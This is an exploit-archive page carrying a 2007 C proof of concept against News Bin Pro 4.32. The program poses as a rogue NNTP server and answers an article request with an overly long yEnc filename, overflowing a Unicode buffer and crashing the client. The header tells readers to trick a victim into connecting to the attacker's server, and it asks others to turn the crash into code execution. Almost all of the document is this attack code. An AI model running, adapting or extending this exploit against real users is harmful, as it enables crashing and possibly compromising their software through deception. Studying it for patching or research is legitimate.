News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit
# Published : 2007-03-12
# Author : Marsu
# Previous Title : TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit
# Next Title : MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
/********************************************************************************
*      News Bin Pro 4.32 Article Grabbing Remote Unicode Buffer Overflow        *
*                                                                               *
*                                                                               *
* There is remote buffer overflow in News Bin Pro 4.32 that can be triggered by *
* grabbing articles that contain an overly long file name.                      *
*                                                                               *
* To exploit, convince someone to set his newsgroup server to your ip:119 and   *
* ask him to download an article and to bypass filters.                         *
*                                                                               *
* This is just a DoS. I couldnt make EIP point to some interesting place. This  *
* is a unicode buffer overflow and we can force EIP to point on 0x00410041. But *
* there's no good call esp in those places. However if we can set EIP to        *
* 0x41004100 the problem is solved. Tell me if you go further.                  *
* Have Fun!                                                                     *
*                                                                               *
* Tested against WIN XP SP2 FR                                                  *
* Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "time.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")


int main(int argc, char* argv[])
{
	char recvbuff[1024];
	char evilbuff[10000];
	sockaddr_in sin;
	int server,client;
	WSADATA wsaData;
	WSAStartup(MAKEWORD(1,1), &wsaData);

	server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	sin.sin_family = PF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	sin.sin_port = htons( 119 );
	bind(server,(SOCKADDR*)&sin,sizeof(sin));
	printf("[+] News Bin Pro 4.32 ARTICLE cmd Remote Unicode Buffer Overflown");
	printf("[+] Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
	printf("[*] Listening on port 119...n");
	listen(server,5);
	printf("[*] Waiting for client...n");
	printf("[+] Once connected, ask him to download and bypass filter a postn");
	
	client=accept(server,NULL,NULL);
	printf("[+] Client connectedn");
	
	if (send(client,"200 Hello therern",17,0)==-1)
	{
		printf("[-] Error in send!n");
		exit(-1);
	}

	//MODE READER article or AUTHINFO user
	memset(recvbuff,0,1024);
	recv(client,recvbuff,1024,0);
	printf("-> %sn",recvbuff);
	if (strstr(recvbuff,"AUTHINFO")) {
		send(client,"381 Pass please?rn",18,0);

		//authinfo pass
		memset(recvbuff,0,1024);
		recv(client,recvbuff,1024,0);
		printf("-> %sn",recvbuff);
		send(client,"281 Pleased to meet yourn",25,0);
	
		//MODE READER
		memset(recvbuff,0,1024);
		recv(client,recvbuff,1024,0);
		printf("-> %sn",recvbuff);	
	}

	memcpy(evilbuff,"200 rn",7);
	send(client,evilbuff,strlen(evilbuff),0);

	//GROUP
	memset(recvbuff,0,1024);
	recv(client,recvbuff,1024,0);
	printf("-> %sn",recvbuff);
	memcpy(evilbuff,"211 935430 87608194 88543623 alt.binaries.blablarn",55);	
	send(client,evilbuff,strlen(evilbuff),0);

	memset(recvbuff,0,1024);
	recv(client,recvbuff,1024,0);
	printf("-> %sn",recvbuff);	

	char* postname=(char *) malloc(strlen(recvbuff)*sizeof(char));
	memset(postname,0,100);
	if (!strstr(recvbuff,"ARTICLE")) {
		printf("[-] ARTICLE were expected. Exploit will fail.n");
	}
	else {
		memcpy(postname,recvbuff+8,strlen(recvbuff)-8);
		printf("[+] Using %s to build evil data.n",postname);
	}
	
char header[]="220 0 ";

char header2[]=" articlern"
"Path: news.giganews.com.POSTED!not-for-mailrn"
"NNTP-Posting-Date: Thu, 01 Mar 2007 11:25:26 -0600rn"
"Lines: 5rn"
"X-Postfilter: 1.3.34rn"
"Xref:news.giganews.com alt.binaries.blabla:123456789rnrnrn"
"=ybegin part=1 line=128 size=127 name="; //we put a large file name here to trigger the overflow

char header3[]="rn"
"=ypart begin=1 end=127rn"
"blablablarn"
"=yend size=127 part=1 pcrc32=d4f19f0frn"
".rn";

	memset(evilbuff,'A',10000);
	memcpy(evilbuff,header,strlen(header));
	memcpy(evilbuff+strlen(header),postname,strlen(postname));
	memcpy(evilbuff+strlen(header)+strlen(postname),header2,strlen(header2));
	memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2)+2000,header3,strlen(header2));
	send(client,evilbuff,strlen(evilbuff),0);
	
	printf("[+] Evil data sent. EIP should have become 0x00410041 n    Tell me if you can go further =)n");
	Sleep(500);
	return 0;
	
}

// www.Syue.com [2007-03-12]